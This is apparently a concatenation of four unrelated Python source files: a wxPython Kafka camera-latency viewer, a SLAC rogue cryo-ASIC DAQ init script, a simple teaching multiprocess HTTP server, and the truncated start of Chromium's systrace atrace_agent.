self.font = wx.Font(25, wx.DEFAULT, wx.NORMAL, wx.NORMAL)
self.flashingText1 = wx.StaticText(self, label = 'Phaya Thai - 1', pos = (530, 610))
self.flashingText2 = wx.StaticText(self, label = 'Phaya Thai - 2', pos = (950, 610))
self.flashingText3 = wx.StaticText(self, label = 'Phaya Thai - 3', pos = (1360, 610))
self.flashingText4 = wx.StaticText(self, label = 'Phaya Thai - 4', pos = (530, 360))
self.flashingText5 = wx.StaticText(self, label = 'Phaya Thai - 5', pos = (950, 360))
self.flashingText6 = wx.StaticText(self, label = 'Phaya Thai - 6', pos = (1360, 360))
self.flashingText1.SetForegroundColour('red')
self.flashingText2.SetForegroundColour('red')
self.flashingText3.SetForegroundColour('red')
self.flashingText4.SetForegroundColour('red')
self.flashingText5.SetForegroundColour('red')
self.flashingText6.SetForegroundColour('red')
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.update, self.timer)
self.timer.Start(50)
# self.timer.Start(200)
def save_list_pi1():
global latency_list_of_pi1
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
# threading.Timer(300.0, save_list_pi1).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi1 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi1, f)
# f.close()
threading.Timer(300.0, save_list_pi1).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi1 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi1, fp)
# fig, ax = plt.subplots()
#
# ax.plot(latency_list_of_pi1)
#
# ax.set(title="Latency per image vs messages (PhayaThai-1) at Local broker 2")
#
# ax.set(xlabel="Number of messages from PhayaThai-1", ylabel="Latency in ms")
#
# plt.show()
latency_list_of_pi1 *= 0
def save_list_pi2():
global latency_list_of_pi2
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi2).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi2 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi2, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi2 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi2, fp)
latency_list_of_pi2 *= 0
def save_list_pi3():
global latency_list_of_pi3
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi3).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi3 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi3, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi3 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi3, fp)
latency_list_of_pi3 *= 0
def save_list_pi4():
global latency_list_of_pi4
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi4).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi4 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi4, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi4 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi4, fp)
latency_list_of_pi4 *= 0
def save_list_pi5():
global latency_list_of_pi5
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi5).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi5 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi5, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi5 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi5, fp)
latency_list_of_pi5 *= 0
def save_list_pi6():
global latency_list_of_pi6
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_list_pi6).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi6 latency list' + current_time + '.txt', 'w')
# simplejson.dump(latency_list_of_pi6, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi6 latency list' + current_time + '.txt', 'w') as fp:
pickle.dump(latency_list_of_pi6, fp)
latency_list_of_pi6 *= 0
def save_loss_list_pi1():
global image_list_pi1
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
# threading.Timer(300.0, save_loss_list_pi1).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi1 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi1, f)
# f.close()
threading.Timer(300.0, save_loss_list_pi1).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi1 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi1, fp)
image_list_pi1 *= 0
def save_loss_list_pi2():
global image_list_pi2
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi2).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi2 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi2, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi2 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi2, fp)
image_list_pi2 *= 0
def save_loss_list_pi3():
global image_list_pi3
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi3).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi3 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi3, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi3 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi3, fp)
image_list_pi3 *= 0
def save_loss_list_pi4():
global image_list_pi4
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi4).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi4 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi4, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi4 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi4, fp)
image_list_pi4 *= 0
def save_loss_list_pi5():
global image_list_pi5
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi5).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi5 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi5, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi5 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi5, fp)
image_list_pi5 *= 0
def save_loss_list_pi6():
global image_list_pi6
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_loss_list_pi6).start()
# f = open('/home/gateway2/Downloads/lab-based_testing_result/testing_result/pi6 image list ' + current_time + '.txt', 'w')
# simplejson.dump(image_list_pi6, f)
# f.close()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi6 image list ' + current_time + '.txt', 'w') as fp:
pickle.dump(image_list_pi6, fp)
image_list_pi6 *= 0
def save_send_time_list_pi1():
global unix_timestamp_of_pi1
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi1).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi1 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi1, fp)
unix_timestamp_of_pi1 *= 0
def save_send_time_list_pi2():
global unix_timestamp_of_pi2
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi2).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi6 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi2, fp)
unix_timestamp_of_pi2 *= 0
def save_send_time_list_pi3():
global unix_timestamp_of_pi3
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi3).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi3 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi3, fp)
unix_timestamp_of_pi3 *= 0
def save_send_time_list_pi4():
global unix_timestamp_of_pi4
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi4).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi4 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi4, fp)
unix_timestamp_of_pi4 *= 0
def save_send_time_list_pi5():
global unix_timestamp_of_pi5
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi5).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi5 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi5, fp)
unix_timestamp_of_pi5 *= 0
def save_send_time_list_pi6():
global unix_timestamp_of_pi6
now = datetime.now()
current_time = now.strftime("%Y-%m-%d_" + "%H:%M:%S.%f")
threading.Timer(300.0, save_send_time_list_pi6).start()
with open('/home/controller/Downloads/lab-based_testing_result/testing_result/pi6 send time list ' + current_time + '.txt', 'w') as fp:
pickle.dump(unix_timestamp_of_pi6, fp)
unix_timestamp_of_pi6 *= 0
save_list_pi1()
save_list_pi2()
save_list_pi3()
save_list_pi4()
save_list_pi5()
save_list_pi6()
save_loss_list_pi1()
save_loss_list_pi2()
save_loss_list_pi3()
save_loss_list_pi4()
save_loss_list_pi5()
save_loss_list_pi6()
save_send_time_list_pi1()
save_send_time_list_pi2()
save_send_time_list_pi3()
save_send_time_list_pi4()
save_send_time_list_pi5()
save_send_time_list_pi6()
def update(self, event):
""""""
global local_consumer1
global local_consumer2
global local_consumer3
global local_consumer4
global local_consumer5
global local_consumer6
global my_queue1
global my_queue2
global my_queue3
global my_queue4
global my_queue5
global my_queue6
global latency_list_of_pi1
global latency_list_of_pi2
global latency_list_of_pi3
global latency_list_of_pi4
global latency_list_of_pi5
global latency_list_of_pi6
global unix_timestamp_of_pi1
global unix_timestamp_of_pi2
global unix_timestamp_of_pi3
global unix_timestamp_of_pi4
global unix_timestamp_of_pi5
global unix_timestamp_of_pi6
global image_list_pi1
global image_list_pi2
global image_list_pi3
global image_list_pi4
global image_list_pi5
global image_list_pi6
def kafka_image(consumer, out_queue, latency_list, timestamp, camera_name, image_list):
msg = next(consumer)
message = msg[6].split(' chula ')
now = int(round(time.time() * 1000))
sending_time = message[1]
time_diff = abs(now - int(float(sending_time)))
stream = cStringIO.StringIO(message[2])
out_queue.put(stream)
print('The latency of' + camera_name+ ' is ' + str(time_diff) + 'ms')
latency_list.append(str(time_diff))
timestamp.append(str(sending_time))
frame = message[0]
image_list.append(frame)
def show_image(default_consumer, my_queue, camera_name, latency_list, timestamp, image_list):
try:
kafka_image(default_consumer, my_queue, latency_list, timestamp, camera_name, image_list)
print('reading message from default '+ camera_name)
except:
# print('message is not found and showing previous image ' + camera_name)
pass
t1 = threading.Thread(target=show_image, args=(local_consumer1, my_queue1, 'PhayaThai-1',latency_list_of_pi1, unix_timestamp_of_pi1, image_list_pi1, ))
t2 = threading.Thread(target=show_image, args=(local_consumer2, my_queue2, 'PhayaThai-2',latency_list_of_pi2, unix_timestamp_of_pi2, image_list_pi2, ))
# t3 = threading.Thread(target=show_image, args=(local_consumer3, my_queue3, 'PhayaThai-3',latency_list_of_pi3, unix_timestamp_of_pi3, image_list_pi3, ))
t4 = threading.Thread(target=show_image, args=(local_consumer4, my_queue4, 'PhayaThai-4',latency_list_of_pi4, unix_timestamp_of_pi4, image_list_pi4, ))
# t5 = threading.Thread(target=show_image, args=(local_consumer5, my_queue5, 'PhayaThai-5',latency_list_of_pi5, unix_timestamp_of_pi5, image_list_pi5, ))
# t6 = threading.Thread(target=show_image, args=(local_consumer6, my_queue6, 'PhayaThai-6',latency_list_of_pi6, unix_timestamp_of_pi6, image_list_pi6, ))
t1.start()
t2.start()
# t3.start()
t4.start()
# t5.start()
# t6.start()
dc = wx.PaintDC(self)
try:
self.bmp1 = wx.BitmapFromImage(wx.ImageFromStream(my_queue1.get_nowait()))
dc.DrawBitmap(self.bmp1, 450, 630)
except:
pass
try:
self.bmp2 = wx.BitmapFromImage(wx.ImageFromStream(my_queue2.get_nowait()))
dc.DrawBitmap(self.bmp2, 860, 630)
except:
pass
# try:
# self.bmp3 = wx.BitmapFromImage(wx.ImageFromStream(my_queue3.get_nowait()))
# dc.DrawBitmap(self.bmp3, 1270, 630)
# except:
# pass
try:
self.bmp4 = wx.BitmapFromImage(wx.ImageFromStream(my_queue4.get_nowait()))
dc.DrawBitmap(self.bmp4, 450, 380)
except:
pass
# try:
# self.bmp5 = wx.BitmapFromImage(wx.ImageFromStream(my_queue5.get_nowait()))
# dc.DrawBitmap(self.bmp5, 860, 380)
# except:
# pass
# try:
# self.bmp6 = wx.BitmapFromImage(wx.ImageFromStream(my_queue6.get_nowait()))
# dc.DrawBitmap(self.bmp6, 1270, 380)
# except:
# pass
#######################################################################################
class MyFrame(wx.Frame):
""""""
# ---------------------------------------------------------------------------------
def __init__(self):
"""Constructor"""
wx.Frame.__init__(self, None, title="An image on a panel", size=(1920, 1080))
panel = MyPanel(self)
self.Show()
# ----------------------------------------------------------------------
if __name__ == "__main__":
app = wx.App(False)
frame = MyFrame()
app.MainLoop()
|
cryoDaqInit.py
|
#!/usr/bin/env python3
#-----------------------------------------------------------------------------
# Title : cryo DAQ top module (based on ePix HR readout)
#-----------------------------------------------------------------------------
# File : cryoDAQ.py evolved from evalBoard.py
# Created : 2018-06-12
# Last update: 2018-06-12
#-----------------------------------------------------------------------------
# Description:
# Rogue interface to cryo ASIC based on ePix HR boards
#-----------------------------------------------------------------------------
# This file is part of the rogue_example software. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue_example software, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import setupLibPaths
import pyrogue as pr
import pyrogue.utilities.prbs
import pyrogue.utilities.fileio
import pyrogue.interfaces.simulation
import pyrogue.gui
import rogue.hardware.pgp
import rogue.protocols
import surf
import surf.axi
import surf.protocols.ssi
from XilinxKcu1500Pgp3.XilinxKcu1500Pgp3 import *
import threading
import signal
import atexit
import yaml
import time
import argparse
import sys
#import testBridge
import ePixViewer as vi
import ePixFpga as fpga
try:
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
except ImportError:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
# Set the argument parser
parser = argparse.ArgumentParser()
# Convert str to bool
argBool = lambda s: s.lower() in ['true', 't', 'yes', '1']
# Add arguments
parser.add_argument(
"--type",
type = str,
required = True,
help = "define the PCIe card type (either pgp-gen3 or kcu1500)",
)
parser.add_argument(
"--start_gui",
type = argBool,
required = False,
default = True,
help = "true to show gui",
)
parser.add_argument(
"--viewer",
type = argBool,
required = False,
default = True,
help = "Start viewer",
)
parser.add_argument(
"--verbose",
type = argBool,
required = False,
default = False,
help = "true for verbose printout",
)
# Add arguments
parser.add_argument(
"--initSeq",
type = int,
required = False,
default = 0,
help = "specify the inicialization sequence to be performed (0 means no initialization).",
)
# Get the arguments
args = parser.parse_args()
#############################################
START_VIEWER = args.viewer
print(args.viewer)
#############################################
# Add PGP virtual channels
if ( args.type == 'pgp-gen3' ):
# Create the PGP interfaces for ePix hr camera
pgpL0Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,0) # Data & cmds
pgpL0Vc1 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,1) # Registers for ePix board
pgpL0Vc2 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,2) # PseudoScope
pgpL0Vc3 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,3) # Monitoring (Slow ADC)
#pgpL1Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,0) # Data (when using all four lanes it should be swapped back with L0)
pgpL2Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',2,0) # Data
pgpL3Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',3,0) # Data
print("")
print("PGP Card Version: %x" % (pgpL0Vc0.getInfo().version))
elif ( args.type == 'kcu1500' ):
# Create the PGP interfaces for ePix hr camera
pgpL0Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+0, True) # Data & cmds
pgpL0Vc1 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+1, True) # Registers for ePix board
pgpL0Vc2 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+2, True) # PseudoScope
pgpL0Vc3 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+3, True) # Monitoring (Slow ADC)
#pgpL1Vc0 = rogue.hardware.data.DataCard('/dev/datadev_0',(0*32)+0) # Data (when using all four lanes it should be swapped back with L0)
pgpL2Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(2*32)+0, True) # Data
pgpL3Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(3*32)+0, True) # Data
elif ( args.type == 'SIM' ):
print('Sim mode')
rogue.Logging.setFilter('pyrogue.SrpV3', rogue.Logging.Debug)
simPort = 11000
pgpL0Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*0) # VC0
pgpL0Vc1 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*1) # VC1
pgpL0Vc2 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*2) # VC2
pgpL0Vc3 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*3) # VC3
pgpL2Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*2)+2*0) # L2VC0
pgpL3Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*3)+2*0) # L3VC0
elif ( args.type == 'dataFile' ):
print("Bypassing hardware.")
else:
raise ValueError("Invalid type (%s)" % (args.type) )
# Add data stream to file as channel 1 File writer
dataWriter = pyrogue.utilities.fileio.StreamWriter(name='dataWriter')
if ( args.type != 'dataFile' ):
pyrogue.streamConnect(pgpL0Vc0, dataWriter.getChannel(0x1))
pyrogue.streamConnect(pgpL0Vc2, dataWriter.getChannel(0x2))
cmd = rogue.protocols.srp.Cmd()
if ( args.type != 'dataFile' ):
pyrogue.streamConnect(cmd, pgpL0Vc0)
# Create and Connect SRP to VC1 to send commands
srp = rogue.protocols.srp.SrpV3()
if ( args.type != 'dataFile' ):
pyrogue.streamConnectBiDir(pgpL0Vc1,srp)
#############################################
# Microblaze console printout
#############################################
class MbDebug(rogue.interfaces.stream.Slave):
def __init__(self):
rogue.interfaces.stream.Slave.__init__(self)
self.enable = False
def _acceptFrame(self,frame):
if self.enable:
p = bytearray(frame.getPayload())
frame.read(p,0)
print('-------- Microblaze Console --------')
print(p.decode('utf-8'))
#######################################
# Custom run control
#######################################
class MyRunControl(pyrogue.RunControl):
def __init__(self,name):
pyrogue.RunControl.__init__(self,name, description='Run Controller ePix HR empty', rates={1:'1 Hz', 2:'2 Hz', 4:'4 Hz', 8:'8 Hz', 10:'10 Hz', 30:'30 Hz', 60:'60 Hz', 120:'120 Hz'})
self._thread = None
def _setRunState(self,dev,var,value,changed):
if changed:
if self.runState.get(read=False) == 'Running':
self._thread = threading.Thread(target=self._run)
self._thread.start()
else:
self._thread.join()
self._thread = None
def _run(self):
self.runCount.set(0)
self._last = int(time.time())
while (self.runState.value() == 'Running'):
delay = 1.0 / ({value: key for key,value in self.runRate.enum.items()}[self._runRate])
time.sleep(delay)
#self._root.ssiPrbsTx.oneShot()
self._runCount += 1
if self._last != int(time.time()):
self._last = int(time.time())
self.runCount._updated()
##############################
# Set base
##############################
class Board(pyrogue.Root):
def __init__(self, guiTop, cmd, dataWriter, srp, **kwargs):
super().__init__(name='cryoAsicGen1',description='cryo ASIC', **kwargs)
self.add(dataWriter)
self.guiTop = guiTop
self.cmd = cmd
@self.command()
def Trigger():
self.cmd.sendCmd(0, 0)
#if (self.EpixHRGen1Cryo.CryoAsic0.test.get() and dataWriter.frameCount.get()):
# pulserAmplitude = self.dataWriter.frameCount.get() #self.EpixHRGen1Cryo.CryoAsic0.Pulser.get()
# if pulserAmplitude%1024 == 1023:
# pulserAmplitude = 0
# else:
# pulserAmplitude += 1
# self.EpixHRGen1Cryo.CryoAsic0.Pulser.set(pulserAmplitude)
# Add Devices
if ( args.type == 'kcu1500' ):
coreMap = rogue.hardware.axi.AxiMemMap('/dev/datadev_0')
self.add(XilinxKcu1500Pgp3(memBase=coreMap))
self.add(fpga.EpixHRGen1Cryo(name='EpixHRGen1Cryo', offset=0, memBase=srp, hidden=False, enabled=True))
self.add(pyrogue.RunControl(name = 'runControl', description='Run Controller hr', cmd=self.Trigger, rates={1:'1 Hz', 2:'2 Hz', 4:'4 Hz', 8:'8 Hz', 10:'10 Hz', 30:'30 Hz', 60:'60 Hz', 120:'120 Hz'}))
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 0[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL0Vc0, dbgData)
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 1[{}]".format(0))
# if (args.verbose): pyrogue.streamTap(pgpL1Vc0, dbgData)
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 2[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL2Vc0, dbgData)
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 3[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL3Vc0, dbgData)
if (args.type == 'SIM'):
# Set the timeout
timeout_time = 100000000 # firmware simulation slow and timeout base on real time (not simulation time)
else:
# Set the timeout
timeout_time = 5000000 # 5.0 seconds default
# Create GUI
appTop = pyrogue.gui.application(sys.argv)
guiTop = pyrogue.gui.GuiTop(group='cryoAsicGui')
cryoAsicBoard = Board(guiTop, cmd, dataWriter, srp)
if ( args.type == 'dataFile' or args.type == 'SIM'):
cryoAsicBoard.start(pollEn=False, pyroGroup=None, timeout=timeout_time)
else:
cryoAsicBoard.start(pollEn=True, pyroGroup=None)
guiTop.addTree(cryoAsicBoard)
guiTop.resize(800,800)
# Viewer gui
if START_VIEWER:
onlineViewer = vi.Window(cameraType='cryo64xN')
onlineViewer.eventReader.frameIndex = 0
onlineViewer.setReadDelay(0)
pyrogue.streamTap(pgpL0Vc0, onlineViewer.eventReader)
if ( args.type != 'dataFile' ):
pyrogue.streamTap(pgpL0Vc2, onlineViewer.eventReaderScope)# PseudoScope
#pyrogue.streamTap(pgpL0Vc3, onlineViewer.eventReaderMonitoring) # Slow Monitoring
if ( args.type == 'dataFile' or args.type == 'SIM'):
print("Simulation mode does not initialize asic")
else:
#configure internal ADC
cryoAsicBoard.EpixHRGen1Cryo.FastADCsDebug.enable.set(True)
cryoAsicBoard.readBlocks()
cryoAsicBoard.EpixHRGen1Cryo.FastADCsDebug.DelayAdc0.set(15)
cryoAsicBoard.EpixHRGen1Cryo.FastADCsDebug.enable.set(False)
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.enable.set(True)
cryoAsicBoard.readBlocks()
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.InternalPdwnMode.set(3)
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.InternalPdwnMode.set(0)
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.OutputFormat.set(0)
cryoAsicBoard.readBlocks()
cryoAsicBoard.EpixHRGen1Cryo.Ad9249Config_Adc_0.enable.set(False)
cryoAsicBoard.readBlocks()
# executes the requested initialization
cryoAsicBoard.EpixHRGen1Cryo.InitCryo(args.initSeq)
# Create GUI
if (args.start_gui):
appTop.exec_()
# Close window and stop polling
cryoAsicBoard.stop()
exit()
|
web_server_2.py
|
#!/usr/bin/python3
# file: multiprocess_web_server.py
# Created by Guang at 19-7-19
# description:
# *-* coding:utf8 *-*
import multiprocessing
import socket
import re
import time
import sys
sys.path.insert(0, "../../")
from mini_web.framework import mini_frame_2
class WSGIServer(object):
def __init__(self, ip, port):
# 1.创建套接字
self.listen_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listen_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 2.绑定ip和port
self.local_addr = (ip, port)
self.listen_server.bind(self.local_addr)
# 3.主动变被动
self.listen_server.listen(128)
def service_client(self, new_socket):
"""为这个客户端返回数据"""
# 1.接收浏览器发送过来的请求, 即HTTP请求
# GET / HTTP/1.1
request = new_socket.recv(1024).decode('utf-8')
# print("-" * 100)
request_lines = request.splitlines() # 当客户端主动关闭, 会收到空字符串并解阻塞; 这里会生成空列表
if not request_lines:
return
print(request_lines[0])
# print(request_lines)
# GET /index.html HTTP/1.1
# GET POST DELETE
file_name = ""
ret = re.match(r'[^/]+(/[^ ]*)', request_lines[0])
if ret:
file_name = ret.group(1)
# print("*" * 50, file_name)
if file_name == "/":
file_name = "/index.html"
# 2.返回HTTP格式的数据
# 2.1 静态资源和动态资源, 假设以 xxx.py 结尾的是动态资源
if not file_name.endswith(".py"):
try:
f = open("./html" + file_name, 'rb')
except Exception as e:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "----------file not found --------"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
# 2.1 准备发送给浏览器的数据 -- header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
# 2.2 准备发送给浏览器的数据 -- body
# response += “哈哈哈哈”
# 将response header 发送给浏览器
new_socket.send(response.encode("utf-8"))
# 将response body 发送给服务器
new_socket.send(html_content)
else:
# 2.2 请求动态资源
header = "HTTP/1.1 200 OK\r\n"
header += "\r\n"
# body = "This is a dynamic source web_app \r\n %s" % time.ctime()
# if file_name == "/login.py":
# body = mini_frame_2.login()
# elif file_name == "/register.py":
# body = mini_frame_2.register()
body = mini_frame_2.application(file_name)
response = header + body
new_socket.send(response.encode("utf-8"))
# 这里必须再关闭一次, 底层文件描述符
new_socket.close()
def runserver(self):
"""主函数: 整体控制"""
while True:
# 4.等待新客户端的连接
new_socket, client_addr = self.listen_server.accept()
# 5.为这个客户端服务
p = multiprocessing.Process(target=self.service_client, args=(new_socket, ))
p.start()
# 进程类实现的并发服务器,必须要在这里也new_socket.close一次; 原因:文件描述符 fd
new_socket.close()
# 关闭监听套接字
self.listen_server.close()
if __name__ == '__main__':
ip = ''
port = 8888
wsgi_server = WSGIServer(ip, port)
wsgi_server.runserver()
|
atrace_agent.py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import py_utils
import re
import sys
import threading
import zlib
from devil.android import device_utils
from devil.android.sdk import version_codes
from py_trace_event import trace_time as trace_time_module
from systrace import trace_result
from systrace import tracing_agents
from systrace import util
# Text that ADB sends, but does not need to be displayed to the user.
ADB_IGNORE_REGEXP = r'^capturing trace\.\.\. done|^capturing trace\.\.\.'
# The number of seconds to wait on output from ADB.
ADB_STDOUT_READ_TIMEOUT = 0.2
# The adb shell command to initiate a trace.
ATRACE_BASE_ARGS = ['atrace']
# If a custom list of categories is not specified, traces will include
# these categories (if available on the device).
DEFAULT_CATEGORIES = 'sched,freq,gfx,view,dalvik,webview,'\
'input,disk,am,wm,rs,binder_driver'
# The command to list trace categories.
LIST_CATEGORIES_ARGS = ATRACE_BASE_ARGS + ['--list_categories']
# Minimum number of seconds between displaying status updates.
MIN_TIME_BETWEEN_STATUS_UPDATES = 0.2
# ADB sends this text to indicate the beginning of the trace data.
TRACE_START_REGEXP = r'TRACE\:'
# Plain-text trace data should always start with this string.
TRACE_TEXT_HEADER = '# tracer'
_FIX_THREAD_IDS = True
_FIX_MISSING_TGIDS = True
_FIX_CIRCULAR_TRACES = True
def list_categories(config):
"""List the possible trace event categories.
This function needs the tracing config since it needs to get the serial
number of the device to send a command to.
Args:
config: Tracing config.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories = devutils.RunShellCommand(
LIST_CATEGORIES_ARGS, check_return=True)
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version < version_codes.MARSHMALLOW:
# work around platform bug where rs tag would corrupt trace until M(Api23)
categories = [c for c in categories if not re.match(r'^\s*rs\s*-', c)]
print '\n'.join(categories)
if not devutils.HasRoot():
print '\nNOTE: more categories may be available with adb root\n'
def get_available_categories(config, device_sdk_version):
"""Gets the list of atrace categories available for tracing.
Args:
config: Tracing config.
